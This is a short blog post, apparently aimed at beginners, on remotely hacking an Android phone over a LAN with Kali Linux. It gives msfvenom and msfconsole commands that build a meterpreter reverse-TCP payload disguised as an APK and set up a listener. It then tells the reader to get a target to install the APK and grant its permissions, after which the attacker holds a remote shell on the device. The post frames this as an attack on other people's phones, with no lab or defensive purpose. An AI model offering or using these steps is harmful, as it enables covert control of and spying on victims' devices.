Android hacking Using Kali Linux
Hello Everyone! In This Post , I will saw you how to remotely hack an android devices over
the LAN network.
First we have to install VirtaulBox Or VM Ware to create virtual machine into the system.
In this machine we have to import kali-linux. After importing kali-linux start it. Then open
terminal as root user. And type following command step-by-step.
Step -1 :- Type the following command to create payload file.
msfvenom -p android/meterpreter/reverse_tcp LHOST = <Your IP address on kali-linux
LPORT = <Any Four no. which you like> R >/var/www/html/file.apk <Where you want to save and file name which you like to give>
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <Your IP address on kali-linux>
set LPORT <Four no. Which you choose in above command>
\ exploit
Step -3 :- After Completion above command you have to send and download paylo
in target android device.
After that , allow all the permission then click on continue. Then open the installed
application.
Step - 4 :- After complete all the steps you got a meterpreter session into the terminal of
exploited device. If you familiar with all commands of meterpreter then type
command which you want see of target device. Otherwise type "help" command
in meterpreter shell.
Thank You for visiting my blog
Follow for new posts about hacking
💥💥💥
Comments
Post a Comment